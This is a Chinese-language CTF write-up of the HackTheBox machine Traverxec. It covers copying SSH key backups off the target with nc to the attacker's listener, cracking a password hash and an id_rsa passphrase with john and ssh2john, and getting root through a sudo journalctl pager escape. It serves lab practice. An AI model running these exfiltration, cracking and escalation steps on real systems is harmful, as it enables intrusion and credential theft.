Traverxec(ssh2john爆破id_rsa对应密码)

目标机器主动连接kali,成功
kali: nc -lnvp 8888 > backup-ssh-identity-files.tgz
目标机器:nc 10.10.14.8 8888 -w 10 < backup-ssh-identity-files.tgz

解压
gunzip backup-ssh-identity-files.tgz
解压后,发现/home/david目录下有authorized_keys id_rsa id_rsa.pub

密码破解

john –wordlist=rockyou.txt whatpass.txt

1
2
3
4
5
6
7
8
9
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me       (?)
1g 0:00:04:04 DONE (2019-12-30 15:08) 0.004088g/s 43248p/s 43248c/s 43248C/s Noxema..Nowhere
Use the "--show" option to display all of the cracked passwords reliably
Session completed

加密格式为md5crypt-long,尝试切换用户,失败
su david/Nowonly4me

su root/Nowonly4me
失败

ssh登陆

ssh david@10.10.10.165 -i id_rsa
输入密码Nowonly4me,失败

1
2
3
locate ssh2john
cd /usr/share/john
python ssh2john.py

运行后提示了用法

1
2
3
4
5
python ssh2john.py /root/Documents/target/165/home/david/.ssh/id_rsa > /tmp/out.txt

cat /tmp/out.txt

john /tmp/out.txt --wordlist=/usr/share/wordlists/rockyou.txt

得出了id_rsa对应的密码

提权

参考资料:https://gtfobins.github.io/gtfobins/journalctl/

journalctl 用来查询 systemd-journald 服务收集到的日志。
再次尝试ssh登陆,ssh david@10.10.10.165 -i id_rsa,输入密码,登陆成功。

1
2
3
4
cd /home/david/bin;ls
cat *.conf
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
!/bin/bash

总结

本次学到了两个知识点:

  1. locate ssh2john
1
2
python ssh2john.py id_rsa > out.txt
john out.txt --wordlist=字典

可以在有id_rsa私钥的情况下,爆破ssh密码

  1. 通过二进制可执行程序的提权方式gtfobins,下次再开一篇讲解。